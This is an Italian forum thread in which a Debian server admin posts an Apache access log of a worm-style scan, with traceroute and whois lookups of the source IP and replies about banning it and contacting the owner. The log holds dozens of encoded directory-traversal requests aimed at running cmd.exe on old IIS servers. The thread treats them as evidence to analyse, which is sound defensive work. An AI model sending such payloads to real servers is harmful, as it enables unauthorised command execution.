Torna indietro   Hardware Upgrade Forum > Software > Linux, Unix, OS alternativi

Sony WF-1000X M6: le cuffie in-ear di riferimento migliorano ancora
Sony WF-1000X M6: le cuffie in-ear di riferimento migliorano ancora
WF-1000X M6 è la sesta generazione di auricolare in-ear sviluppata da Sony, un prodotto che punta a coniugare facilità di utilizzo con una elevata qualità di riproduzione dei contenuti audio e una cura nella riduzione del rumore ambientale che sia da riferimento
Snowflake porta l'IA dove sono i dati, anche grazie a un accordo con OpenAI
Snowflake porta l'IA dove sono i dati, anche grazie a un accordo con OpenAI
Snowflake ha presentato diverse novità per la sua piattaforma legate all'intelligenza artificiale. Quella forse più eclatante è una collaborazione con OpenAI, ma non mancano diverse nuove funzionalità che rendono la piattaforma più flessibile e in grado di rispondere meglio alle esigenze in continuo cambiamento delle aziende
Sistema Mesh Roamii BE Pro: il Wi-Fi 7 secondo MSI
Sistema Mesh Roamii BE Pro: il Wi-Fi 7 secondo MSI
Con velocità teoriche fino a 11 Gbps, gestione tramite app intelligente e protezione avanzata dei dispositivi, Roamii BE Pro porta il Wi‑Fi 7 tri‑band nelle abitazioni più esigenti. Un sistema Wi-Fi Mesh proposto da MSI allo scopo di garantire agli utenti una rete fluida e continua capace di sostenere streaming 8K, gaming competitivo e le applicazioni moderne più esigenti in termini di banda
Tutti gli articoli Tutte le news

Vai al Forum
Rispondi
 
Strumenti
Old 24-05-2006, 12:28   #1
Serpico78
Senior Member
 
L'Avatar di Serpico78
 
Iscritto dal: May 2003
Città: Pontedera
Messaggi: 569
Strani log apache

Non so se è la sezione adatta, ma considerato che la macchina su cui ho trovato questi log ha su una Debian con apache 2 non dovrebbe neanche essere la più sbagliata....
Codice:
apache2/access.log

204.17.105.163 - - [23/May/2006:06:42:06 +0200] "GET /..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 308 "-" "Mozilla/3.0 (compatible; Indy Library)"
204.17.105.163 - - [23/May/2006:06:42:07 +0200] "GET /..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 305 "-" "Mozilla/3.0 (compatible; Indy Library)"
204.17.105.163 - - [23/May/2006:06:42:08 +0200] "GET /_vti_bin/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 327 "-" "Mozilla/3.0 (compatible; Indy Library)"
204.17.105.163 - - [23/May/2006:06:42:08 +0200] "GET /_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 304 "-" "Mozilla/3.0 (compatible; Indy Library)"
204.17.105.163 - - [23/May/2006:06:42:09 +0200] "GET /_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 304 "-" "Mozilla/3.0 (compatible; Indy Library)"
204.17.105.163 - - [23/May/2006:06:42:09 +0200] "GET /_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 335 "-" "Mozilla/3.0 (compatible; Indy Library)"
204.17.105.163 - - [23/May/2006:06:42:10 +0200] "GET /_vti_bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 337 "-" "Mozilla/3.0 (compatible; Indy Library)"
204.17.105.163 - - [23/May/2006:06:42:10 +0200] "GET /_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 335 "-" "Mozilla/3.0 (compatible; Indy Library)"
204.17.105.163 - - [23/May/2006:06:42:11 +0200] "GET /_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 330 "-" "Mozilla/3.0 (compatible; Indy Library)"
204.17.105.163 - - [23/May/2006:06:42:12 +0200] "GET /_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 328 "-" "Mozilla/3.0 (compatible; Indy Library)"
204.17.105.163 - - [23/May/2006:06:42:12 +0200] "GET /_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 337 "-" "Mozilla/3.0 (compatible; Indy Library)"
204.17.105.163 - - [23/May/2006:06:42:13 +0200] "GET /_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 330 "-" "Mozilla/3.0 (compatible; Indy Library)"
204.17.105.163 - - [23/May/2006:06:42:13 +0200] "GET /adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 338 "-" "Mozilla/3.0 (compatible; Indy Library)"
204.17.105.163 - - [23/May/2006:06:42:14 +0200] "GET /adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 331 "-" "Mozilla/3.0 (compatible; Indy Library)"
204.17.105.163 - - [23/May/2006:06:42:15 +0200] "GET /cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 336 "-" "Mozilla/3.0 (compatible; Indy Library)"
204.17.105.163 - - [23/May/2006:06:42:15 +0200] "GET /cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 329 "-" "Mozilla/3.0 (compatible; Indy Library)"
204.17.105.163 - - [23/May/2006:06:42:16 +0200] "GET /iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 338 "-" "Mozilla/3.0 (compatible; Indy Library)"
204.17.105.163 - - [23/May/2006:06:42:16 +0200] "GET /iisadmpwd/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 338 "-" "Mozilla/3.0 (compatible; Indy Library)"
204.17.105.163 - - [23/May/2006:06:42:17 +0200] "GET /iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 331 "-" "Mozilla/3.0 (compatible; Indy Library)"
204.17.105.163 - - [23/May/2006:06:42:18 +0200] "GET /iisadmpwd/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 329 "-" "Mozilla/3.0 (compatible; Indy Library)"
204.17.105.163 - - [23/May/2006:06:42:18 +0200] "GET /msadc/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 324 "-" "Mozilla/3.0 (compatible; Indy Library)"
204.17.105.163 - - [23/May/2006:06:42:19 +0200] "GET /MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 304 "-" "Mozilla/3.0 (compatible; Indy Library)"
204.17.105.163 - - [23/May/2006:06:42:19 +0200] "GET /msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 304 "-" "Mozilla/3.0 (compatible; Indy Library)"
204.17.105.163 - - [23/May/2006:06:42:20 +0200] "GET /MSADC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 304 "-" "Mozilla/3.0 (compatible; Indy Library)"
204.17.105.163 - - [23/May/2006:06:42:21 +0200] "GET /msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 304 "-" "Mozilla/3.0 (compatible; Indy Library)"
204.17.105.163 - - [23/May/2006:06:42:21 +0200] "GET /msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 324 "-" "Mozilla/3.0 (compatible; Indy Library)"
204.17.105.163 - - [23/May/2006:06:42:22 +0200] "GET /msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 328 "-" "Mozilla/3.0 (compatible; Indy Library)"
204.17.105.163 - - [23/May/2006:06:42:22 +0200] "GET /msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 324 "-" "Mozilla/3.0 (compatible; Indy Library)"
204.17.105.163 - - [23/May/2006:06:42:23 +0200] "GET /msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 328 "-" "Mozilla/3.0 (compatible; Indy Library)"
204.17.105.163 - - [23/May/2006:06:42:24 +0200] "GET /msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 325 "-" "Mozilla/3.0 (compatible; Indy Library)"
204.17.105.163 - - [23/May/2006:06:42:24 +0200] "GET /msadc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 318 "-" "Mozilla/3.0 (compatible; Indy Library)"
204.17.105.163 - - [23/May/2006:06:42:24 +0200] "GET /msadc/../%e0/%80/%af../../%e0/%80/%af../../%e0/%80/%af../winnt/system32/cmd.exe/?/c/+dir+c: HTTP/1.1" 404 315 "-" "Mozilla/3.0 (compatible; Indy Library)"
204.17.105.163 - - [23/May/2006:06:42:25 +0200] "GET /msdac/root.exe?/c+dir+c: HTTP/1.1" 404 290 "-" "Mozilla/3.0 (compatible; Indy Library)"
204.17.105.163 - - [23/May/2006:06:42:26 +0200] "GET /msdac/shell.exe?/c+dir+c: HTTP/1.1" 404 291 "-" "Mozilla/3.0 (compatible; Indy Library)"
204.17.105.163 - - [23/May/2006:06:42:26 +0200] "GET /PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 304 "-" "Mozilla/3.0 (compatible; Indy Library)"
204.17.105.163 - - [23/May/2006:06:42:27 +0200] "GET /PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 304 "-" "Mozilla/3.0 (compatible; Indy Library)"
204.17.105.163 - - [23/May/2006:06:42:28 +0200] "GET /PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 322 "-" "Mozilla/3.0 (compatible; Indy Library)"
204.17.105.163 - - [23/May/2006:06:42:29 +0200] "GET /PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 322 "-" "Mozilla/3.0 (compatible; Indy Library)"
204.17.105.163 - - [23/May/2006:06:42:29 +0200] "GET /Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 304 "-" "Mozilla/3.0 (compatible; Indy Library)"
204.17.105.163 - - [23/May/2006:06:42:30 +0200] "GET /Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 304 "-" "Mozilla/3.0 (compatible; Indy Library)"
204.17.105.163 - - [23/May/2006:06:42:30 +0200] "GET /Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 317 "-" "Mozilla/3.0 (compatible; Indy Library)"
204.17.105.163 - - [23/May/2006:06:42:31 +0200] "GET /Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 317 "-" "Mozilla/3.0 (compatible; Indy Library)"
204.17.105.163 - - [23/May/2006:06:42:31 +0200] "GET /samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 336 "-" "Mozilla/3.0 (compatible; Indy Library)"
204.17.105.163 - - [23/May/2006:06:42:32 +0200] "GET /samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 329 "-" "Mozilla/3.0 (compatible; Indy Library)"
204.17.105.163 - - [23/May/2006:06:42:33 +0200] "GET /scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 312 "-" "Mozilla/3.0 (compatible; Indy Library)"
204.17.105.163 - - [23/May/2006:06:42:33 +0200] "GET /scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 316 "-" "Mozilla/3.0 (compatible; Indy Library)"
204.17.105.163 - - [23/May/2006:06:42:34 +0200] "GET /scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 326 "-" "Mozilla/3.0 (compatible; Indy Library)"
204.17.105.163 - - [23/May/2006:06:42:34 +0200] "GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 316 "-" "Mozilla/3.0 (compatible; Indy Library)"
204.17.105.163 - - [23/May/2006:06:42:35 +0200] "GET /scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 304 "-" "Mozilla/3.0 (compatible; Indy Library)"
204.17.105.163 - - [23/May/2006:06:42:36 +0200] "GET /scripts/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 322 "-" "Mozilla/3.0 (compatible; Indy Library)"
204.17.105.163 - - [23/May/2006:06:42:36 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 313 "-" "Mozilla/3.0 (compatible; Indy Library)"
204.17.105.163 - - [23/May/2006:06:42:37 +0200] "GET /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 304 "-" "Mozilla/3.0 (compatible; Indy Library)"
204.17.105.163 - - [23/May/2006:06:42:37 +0200] "GET /scripts/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 322 "-" "Mozilla/3.0 (compatible; Indy Library)"
204.17.105.163 - - [23/May/2006:06:42:38 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 313 "-" "Mozilla/3.0 (compatible; Indy Library)"
204.17.105.163 - - [23/May/2006:06:42:39 +0200] "GET /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 304 "-" "Mozilla/3.0 (compatible; Indy Library)"
204.17.105.163 - - [23/May/2006:06:42:40 +0200] "GET /scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 322 "-" "Mozilla/3.0 (compatible; Indy Library)"
204.17.105.163 - - [23/May/2006:06:42:40 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 313 "-" "Mozilla/3.0 (compatible; Indy Library)"
204.17.105.163 - - [23/May/2006:06:42:41 +0200] "GET /scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 313 "-" "Mozilla/3.0 (compatible; Indy Library)"
204.17.105.163 - - [23/May/2006:06:42:41 +0200] "GET /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 304 "-" "Mozilla/3.0 (compatible; Indy Library)"
204.17.105.163 - - [23/May/2006:06:42:42 +0200] "GET /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 314 "-" "Mozilla/3.0 (compatible; Indy Library)"
204.17.105.163 - - [23/May/2006:06:42:43 +0200] "GET /scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 315 "-" "Mozilla/3.0 (compatible; Indy Library)"
204.17.105.163 - - [23/May/2006:06:42:43 +0200] "GET /scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 316 "-" "Mozilla/3.0 (compatible; Indy Library)"
204.17.105.163 - - [23/May/2006:06:42:44 +0200] "GET /scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 317 "-" "Mozilla/3.0 (compatible; Indy Library)"
204.17.105.163 - - [23/May/2006:06:42:44 +0200] "GET /scripts/root.exe?/c+dir+c: HTTP/1.1" 404 292 "-" "Mozilla/3.0 (compatible; Indy Library)"
204.17.105.163 - - [23/May/2006:06:42:45 +0200] "GET /scripts/shell.exe?/c+dir+c: HTTP/1.1" 404 293 "-" "Mozilla/3.0 (compatible; Indy Library)"
Facendo una ricerchina su google credo di aver capito che è stata la scansione di un qualche worms o script per cercare delle vulnerabilità sul sistema.

Cercando di rintracciare da dove veniva l'attacco ho trovato :
Quote:
traceroute to 204.17.105.163 (204.17.105.163), 30 hops max, 40 byte packets
1 * * *
2 213.205.24.107 (213.205.24.107) 8.053 ms 7.852 ms 7.664 ms
3 po1.c7206.pi-bkb1.net.tiscali.it (213.205.27.65) 8.329 ms 7.321 ms 7.852 ms
4 213.205.31.129 (213.205.31.129) 9.351 ms 8.173 ms 8.017 ms
5 pos-4-3.rom20.ip.tiscali.it (213.205.17.173) 16.473 ms 13.581 ms 15.770 ms
6 so-2-0-0.was10.ip.tiscali.net (213.200.82.197) 108.595 ms 109.032 ms 108.241 ms
7 4.68.127.193 (4.68.127.193) 124.642 ms 4.68.127.197 (4.68.127.197) 123.354 ms 128.358 ms
8 ae-1-53.bbr1.Washington1.Level3.net (4.68.121.65) 108.851 ms 108.449 ms 140.239 ms
9 so-3-0-0.mp1.Boston1.Level3.net (209.247.9.125) 171.066 ms so-2-0-0.mp2.Boston1.Level3.net (64.159.4.181) 116.205 ms so-3-0-0.mp1.Boston1.Level3.net (209.247.9.125) 115.944 ms
10 ae-21-56.car1.Boston1.Level3.net (4.68.100.162) 116.116 ms ae-11-55.car1.Boston1.Level3.net (4.68.100.130) 116.092 ms ae-11-51.car1.Boston1.Level3.net (4.68.100.2) 116.219 ms
11 unknown.Level3.net (166.90.184.74) 117.994 ms 117.825 ms 118.040 ms
12 ma1-bb1-ge-0-3-0-100.conversent.net (209.113.217.225) 121.064 ms 121.037 ms 121.494 ms
13 ct1-bb2-as0.conversent.net (209.113.217.230) 126.999 ms 127.172 ms 126.684 ms
14 ct1-bb1-ae0-100.conversent.net (209.113.217.193) 119.780 ms 148.760 ms 119.639 ms
15 ny1-bb2-ge-0-1-0.conversent.net (209.113.217.114) 158.876 ms 119.833 ms 120.337 ms
16 nj1-gw0-at-1-0-10262.conversent.net (209.113.217.238) 125.751 ms 122.684 ms 121.579 ms
17 nj1-gw1-gi0-1.conversent.net (204.17.105.4) 135.798 ms 124.664 ms 125.988 ms
18 204.17.105.161 (204.17.105.161) 134.443 ms 138.942 ms 158.149 ms
19 * * *
20 ttdev2.teleran.com (204.17.105.163) 236.941 ms 152.394 ms 178.325 ms
Quindi l'ip sembra appartenere a una certa società Teleran.com con sede nel Massachusset.

A questo punto che faccio?

Invio una e-mail al loro webmaster per segnalare la cosa?

Si accettano suggerimenti.
__________________
MSI Z68A GD65 (G3)0, i7 - 2600 @3400 Mhz, 4 x 4 GB DDR3 1333 Corsair, Sapphire R 290 TRI-Xcules 4GB DDR5, Corsair Force GT 256 GB & Western Digital Caviar Black 2TB
Serpico78 è offline   Rispondi citando il messaggio o parte di esso
Old 24-05-2006, 14:52   #2
3mentina
Senior Member
 
L'Avatar di 3mentina
 
Iscritto dal: Jun 2004
Messaggi: 369
ciao, come si fa a terminare apache.exe? dal task manager mi nega l'accesso!
__________________
| Italiani Liberi |
3mentina è offline   Rispondi citando il messaggio o parte di esso
Old 26-05-2006, 07:53   #3
3mentina
Senior Member
 
L'Avatar di 3mentina
 
Iscritto dal: Jun 2004
Messaggi: 369
risolto grazie
__________________
| Italiani Liberi |
3mentina è offline   Rispondi citando il messaggio o parte di esso
Old 26-05-2006, 07:59   #4
3mentina
Senior Member
 
L'Avatar di 3mentina
 
Iscritto dal: Jun 2004
Messaggi: 369
Quote:
Originariamente inviato da Serpico78
Non so se è la sezione adatta, ma considerato che la macchina su cui ho trovato questi log ha su una Debian con apache 2 non dovrebbe neanche essere la più sbagliata....
Facendo una ricerchina su google credo di aver capito che è stata la scansione di un qualche worms o script per cercare delle vulnerabilità sul sistema.

Cercando di rintracciare da dove veniva l'attacco ho trovato :


Quindi l'ip sembra appartenere a una certa società Teleran.com con sede nel Massachusset.

A questo punto che faccio?

Invio una e-mail al loro webmaster per segnalare la cosa?

Si accettano suggerimenti.
Prova a vedere se sul sito del garante per la privacy c'è qualche istruzione in merito a questo genere di cose.

Sulla macchina non c'era un antivirus o un antispy?

Conosci un modo per tenere sotto controllo le comunicazioni del server Apache? Sto iniziando ad usarlo per un database e non vorrei che le contenute informazioni fossero carpite.

grazie.

(scusa per aver sporcato la discussione)
__________________
| Italiani Liberi |
3mentina è offline   Rispondi citando il messaggio o parte di esso
Old 26-05-2006, 11:59   #5
Serpico78
Senior Member
 
L'Avatar di Serpico78
 
Iscritto dal: May 2003
Città: Pontedera
Messaggi: 569
Quote:
Originariamente inviato da 3mentina

Conosci un modo per tenere sotto controllo le comunicazioni del server Apache? Sto iniziando ad usarlo per un database e non vorrei che le contenute informazioni fossero carpite.

grazie.

(scusa per aver sporcato la discussione)
Fai in modo che l'apache non stia in ascolto su una porta esterna, oppure lo filtri a livello di iptable (firewall) in modo che il servizio sia accessibile solo dalla rete interna.
__________________
MSI Z68A GD65 (G3)0, i7 - 2600 @3400 Mhz, 4 x 4 GB DDR3 1333 Corsair, Sapphire R 290 TRI-Xcules 4GB DDR5, Corsair Force GT 256 GB & Western Digital Caviar Black 2TB
Serpico78 è offline   Rispondi citando il messaggio o parte di esso
Old 26-05-2006, 13:14   #6
dennyv
Senior Member
 
L'Avatar di dennyv
 
Iscritto dal: Sep 2003
Città: Bergamo
Messaggi: 1176
Banna direttamente l'ip o addirittura tutta la network della società a livello di ip. Poi guarda tramite il whois se c'è una email dell'abuse (nel 90% dei casi non serve ad un tubo, ma tentar non nuoce).
__________________
VGA? No grazie, preferisco le SERIALI!
http://daniele.vigano.me | Home server HP Proliant MicroServer (Fedora 64bit) | Notebook Dell Latitude E5450 (Fedora 64bit) | Mobile Moto G3
GEM HPC Cluster Dell PowerEdge R720xd + R720 + R420 + M1000e + M915 (Ubuntu LTS 64bit) up to 1000 cores | EATON UPS
dennyv è offline   Rispondi citando il messaggio o parte di esso
Old 26-05-2006, 16:33   #7
Serpico78
Senior Member
 
L'Avatar di Serpico78
 
Iscritto dal: May 2003
Città: Pontedera
Messaggi: 569
Quote:
Originariamente inviato da dennyv
Banna direttamente l'ip o addirittura tutta la network della società a livello di ip. Poi guarda tramite il whois se c'è una email dell'abuse (nel 90% dei casi non serve ad un tubo, ma tentar non nuoce).
Thanks, al whois non avevo pensato.

Non hanno un'e-mail per l'abuse, ma in compenso ho scoperto la loro gamma di ip, al momento non li banno e magari farò una segnalazione al loro webmaster, ma se scopro altri movimenti sospetti dai loro ip gli banno tutta la gamma degli ip che hanno a disposizione.
Codice:
$ whois --verbose 204.17.105.163
Uso il server whois.arin.net.
Richiesta: "204.17.105.163"

Conversent Communications CONVERSENT-204-17-64 (NET-204-17-64-0-1)
                                  204.17.64.0 - 204.17.127.255
Teleran Technologies, Inc. OEMN-204-17-105-160 (NET-204-17-105-160-1)
                                  204.17.105.160 - 204.17.105.167

# ARIN WHOIS database, last updated 2006-05-25 19:10
# Enter ? for additional hints on searching ARIN's WHOIS database.
__________________
MSI Z68A GD65 (G3)0, i7 - 2600 @3400 Mhz, 4 x 4 GB DDR3 1333 Corsair, Sapphire R 290 TRI-Xcules 4GB DDR5, Corsair Force GT 256 GB & Western Digital Caviar Black 2TB
Serpico78 è offline   Rispondi citando il messaggio o parte di esso
Old 27-05-2006, 12:24   #8
3mentina
Senior Member
 
L'Avatar di 3mentina
 
Iscritto dal: Jun 2004
Messaggi: 369
Quote:
Originariamente inviato da Serpico78
Fai in modo che l'apache non stia in ascolto su una porta esterna, oppure lo filtri a livello di iptable (firewall) in modo che il servizio sia accessibile solo dalla rete interna.
l'accesso dall'esterno dovrebbe essere sotto controllo (solo localhost), non vorrei però che nell'applicazione (è un crm opensource) contenesse istruzioni per spedire all'esterno le informazioni del database (mysql)
__________________
| Italiani Liberi |
3mentina è offline   Rispondi citando il messaggio o parte di esso
 Rispondi


Sony WF-1000X M6: le cuffie in-ear di riferimento migliorano ancora Sony WF-1000X M6: le cuffie in-ear di riferiment...
Snowflake porta l'IA dove sono i dati, anche grazie a un accordo con OpenAI Snowflake porta l'IA dove sono i dati, anche gra...
Sistema Mesh Roamii BE Pro: il Wi-Fi 7 secondo MSI Sistema Mesh Roamii BE Pro: il Wi-Fi 7 secondo M...
Recensione HUAWEI Mate X7: un foldable ottimo, ma restano i soliti problemi Recensione HUAWEI Mate X7: un foldable ottimo, m...
Nioh 3: souls-like punitivo e Action RPG Nioh 3: souls-like punitivo e Action RPG
Zscaler Threat Report 2026: l'adozione d...
Claude AI minaccia omicidi e ricatti qua...
Dentro la gara: a Milano Cortina 2026 i ...
Samsung Display presenta QD-OLED Penta T...
KONAMI torna con "Silent Hill: Town...
Rende il citofono smart a 44,99€: Ring I...
ThunderX3 XTC, la sedia da ufficio che s...
Mercy, Mission Impossible, Aronofsky: il...
Project Windless: il nuovo action in esc...
Saros: mostrato il gameplay del gioco de...
God of War: Sons of Sparta annunciato e ...
John Wick torna in un nuovo videogioco a...
MADE chiude il 2025 con 59 partner e 250...
007 First Light: allo State of Play un n...
Gli iPhone su Amazon costano meno che su...
Chromium
GPU-Z
OCCT
LibreOffice Portable
Opera One Portable
Opera One 106
CCleaner Portable
CCleaner Standard
Cpu-Z
Driver NVIDIA GeForce 546.65 WHQL
SmartFTP
Trillian
Google Chrome Portable
Google Chrome 120
VirtualBox
Tutti gli articoli Tutte le news Tutti i download

Strumenti

Regole
Non Puoi aprire nuove discussioni
Non Puoi rispondere ai messaggi
Non Puoi allegare file
Non Puoi modificare i tuoi messaggi

Il codice vB è On
Le Faccine sono On
Il codice [IMG] è On
Il codice HTML è Off
Vai al Forum


Tutti gli orari sono GMT +1. Ora sono le: 00:14.


Powered by vBulletin® Version 3.6.4
Copyright ©2000 - 2026, Jelsoft Enterprises Ltd.
Served by www3v